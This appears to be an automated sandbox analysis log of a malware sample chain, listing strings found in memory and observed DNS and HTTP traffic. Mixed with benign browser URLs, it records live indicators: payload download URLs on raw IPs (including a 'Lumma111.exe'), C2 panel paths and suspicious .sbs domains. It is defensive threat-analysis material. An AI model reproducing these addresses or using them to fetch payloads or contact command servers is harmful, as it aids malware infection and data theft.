Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002E.00000002.3113524727.0000020877B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg*://auth.9c9media.ca/auth/main.js*://www.rva311.com/static/js/main.*.chunk.js*://libs.coremetrics.com/eluminate.jshttps://smartblock.firefox.etp/facebook.svgresource://gre/modules/FileUtils.sys.mjs*://connect.facebook.net/*/sdk.js**://connect.facebook.net/*/all.js*FileUtils_closeAtomicFileOutputStream*://pub.doubleverify.com/signals/pub.js*@mozilla.org/network/file-output-stream;1@mozilla.org/addons/addon-manager-startup;1@mozilla.org/network/atomic-file-output-stream;1webcompat-reporter@mozilla.org.xpi*://www.google-analytics.com/gtm/js**://ssl.google-analytics.com/ga.js*://s0.2mdn.net/instream/html5/ima3.js*://imasdk.googleapis.com/js/sdkloader/ima3.js*://cdn.adsafeprotected.com/iasPET.1.js*://static.adsafeprotected.com/iasPET.1.js*://adservex.media.net/videoAds.js**://*.vidible.tv/*/vidible-min.js**://cdn.optimizely.com/public/*.js*://s.webtrends.com/js/advancedLinkTracking.js*://www.googletagmanager.com/gtm.js**://www.google-analytics.com/analytics.js**://pagead2.googlesyndication.com/tag/js/gpt.js**://*.moatads.com/*/moatheader.js**://www.googletagservices.com/tag/js/gpt.js**://js.maxmind.com/js/apis/geoip2/*/geoip2.js*://www.google-analytics.com/plugins/ua/ec.js*://s.webtrends.com/js/webtrends.js*://s.webtrends.com/js/webtrends.min.jsresource://gre/modules/AsyncShutdown.sys.mjs equals www.facebook.com (Facebook)
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000010.00000002.2858834589.0000481C024C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: home.fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: p10tgrace.sbs
Source: global traffic DNS traffic detected: DNS query: processhol.sbs
Source: global traffic DNS traffic detected: DNS query: librari-night.sbs
Source: global traffic DNS traffic detected: DNS query: cook-rain.sbs
Source: global traffic DNS traffic detected: DNS query: fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: librari-night.sbs
Source: chrome.exe, 00000010.00000002.2859323740.0000481C0251C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Https://docs.google.com/
Source: ae87049195.exe, 00000007.00000003.2449281567.00000000077F2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.css
Source: ae87049195.exe, 00000007.00000003.2449281567.00000000077F2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.jpg
Source: skotes.exe, 00000006.00000002.3026230635.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: skotes.exe, 00000006.00000002.3026230635.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exeE
Source: skotes.exe, 00000006.00000002.3026230635.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exeT
Source: cfc45d1c7c.exe, 0000000A.00000003.2937034827.00000000013D7000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2935895304.00000000013AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: cfc45d1c7c.exe, 0000000A.00000003.2935895304.00000000013AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeP
Source: cfc45d1c7c.exe, 0000000A.00000003.2935895304.00000000013AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exePm
Source: cfc45d1c7c.exe, 0000000A.00000003.2935895304.00000000013AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exehU
Source: skotes.exe, 00000006.00000002.3026230635.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exe
Source: skotes.exe, 00000006.00000002.3026230635.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exeAppDataB
Source: skotes.exe, 00000006.00000002.3026230635.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2935895304.00000000013AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: skotes.exe, 00000006.00000002.3026230635.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exe
Source: skotes.exe, 00000006.00000002.3026230635.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exev
Source: cfc45d1c7c.exe, 0000000A.00000003.2937966342.00000000013CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16:80/off/def.exe
Source: 686764db73.exe, 0000000B.00000002.2749590843.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp, 686764db73.exe, 0000001E.00000002.2943159738.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: 686764db73.exe, 0000001E.00000002.2943159738.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp, 686764db73.exe, 0000001E.00000002.2943159738.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: 686764db73.exe, 0000001E.00000002.2943159738.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/C
Source: 686764db73.exe, 0000001E.00000002.2943159738.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: 686764db73.exe, 0000000B.00000002.2749590843.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp, 686764db73.exe, 0000001E.00000002.2943159738.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: 686764db73.exe, 0000000B.00000002.2749590843.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php2
Source: 686764db73.exe, 0000001E.00000002.2943159738.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php5
Source: 686764db73.exe, 0000001E.00000002.2943159738.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpA
Source: 686764db73.exe, 0000000B.00000002.2749590843.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpC
Source: 686764db73.exe, 0000000B.00000002.2749590843.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpS
Source: 686764db73.exe, 0000001E.00000002.2943159738.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpe
Source: 686764db73.exe, 0000000B.00000002.2749590843.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpo
Source: 686764db73.exe, 0000001E.00000002.2943159738.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpq
Source: 686764db73.exe, 0000000B.00000002.2749590843.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpv
Source: 686764db73.exe, 0000001E.00000002.2943159738.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/f
Source: 686764db73.exe, 0000001E.00000002.2943159738.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/icrosoft
Source: 686764db73.exe, 0000001E.00000002.2943159738.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ta
Source: 686764db73.exe, 0000000B.00000002.2749590843.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ws
Source: 686764db73.exe, 0000000B.00000002.2749590843.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206Vc
Source: 686764db73.exe, 0000001E.00000002.2943159738.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206_Z
Source: skotes.exe, 00000006.00000002.3026230635.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 00000006.00000002.3026230635.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Local
Source: skotes.exe, 00000006.00000002.3026230635.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3026230635.0000000000B34000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3026230635.0000000000A98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000006.00000002.3026230635.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php/&
Source: skotes.exe, 00000006.00000002.3026230635.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php32g
Source: skotes.exe, 00000006.00000002.3026230635.0000000000B34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php7748001
Source: skotes.exe, 00000006.00000002.3026230635.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpI
Source: skotes.exe, 00000006.00000002.3026230635.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpcoded0
Source: skotes.exe, 00000006.00000002.3026230635.0000000000A98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpm
Source: skotes.exe, 00000006.00000002.3026230635.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000006.00000002.3026230635.0000000000B34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php~v
Source: skotes.exe, 00000006.00000002.3026230635.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/ones
Source: skotes.exe, 00000006.00000002.3026230635.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/Lumma111.exe
Source: skotes.exe, 00000006.00000002.3026230635.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/random.exe
Source: skotes.exe, 00000006.00000002.3026230635.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/random.exe/ZF
Source: skotes.exe, 00000006.00000002.3026230635.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/random.exe5062384760
Source: skotes.exe, 00000006.00000002.3026230635.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/random.exe5062384Sa1
Source: skotes.exe, 00000006.00000002.3026230635.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/random.exetZ
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2162
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2517
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2970
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3078
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3205
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3206
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3452
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3498
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3502
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3577
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3584
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3586
Source: chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3623
Source: chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3624
Source: chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3625
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3832
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3862
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3965
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3970
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4324
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4384
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4405
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4428
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4551
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4633
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4722
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4836
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4901
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4937
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5007
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5055
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5061
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5281
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5371
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5375
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5421
Source: chrome.exe, 00000010.00000002.2836020214.000014780078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 00000010.00000002.2836020214.000014780078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2788824550.0000147800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000010.00000003.2787989377.0000147800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2838782961.000014780080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2788263759.000014780039C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000010.00000002.2843943680.0000481C0221C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000010.00000002.2856474789.0000481C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 00000010.00000002.2856474789.0000481C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/g1
Source: chrome.exe, 00000010.00000003.2783736968.00006628002E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2783692557.00006628002D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000010.00000002.2866233135.0000481C02824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2867325174.0000481C028C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2865803429.0000481C027CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2868443298.0000481C02978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2794018993.0000481C02638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2843943680.0000481C0221C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2867701402.0000481C028F2000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2865921179.0000481C027E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2867422206.0000481C028DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxH
Source: chrome.exe, 00000010.00000002.2871330890.0000481C02B98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 00000010.00000002.2871330890.0000481C02B98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 00000010.00000002.2868360398.0000481C02960000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 00000010.00000002.2856474789.0000481C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 00000010.00000002.2856474789.0000481C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 00000010.00000002.2866381760.0000481C02844000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 0000001D.00000003.2841469664.0000019955000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2842626549.000001995525A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2842327005.000001995523C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2841937085.000001995521F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2843820259.0000019955277000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: cfc45d1c7c.exe, 0000000A.00000003.2742429742.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2901520379.0000000005A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2929336192.000001994D4CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2928726607.000001B63A0CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3074999272.00000208774AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: cfc45d1c7c.exe, 0000000A.00000003.2742429742.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2929336192.000001994D4CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2928726607.000001B63A0CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3074999272.00000208774AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: cfc45d1c7c.exe, 0000000C.00000003.2964412218.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2942020606.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2825989028.00000000013B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/
Source: cfc45d1c7c.exe, 0000000C.00000003.2967887265.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2965707647.00000000013CC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2964412218.00000000013CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/)
Source: cfc45d1c7c.exe, 0000000A.00000003.2742429742.00000000013BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs//w
Source: cfc45d1c7c.exe, 0000000A.00000003.2716905695.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2717592699.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/3n9
Source: cfc45d1c7c.exe, 0000000A.00000003.2693159452.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2693380324.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/3u
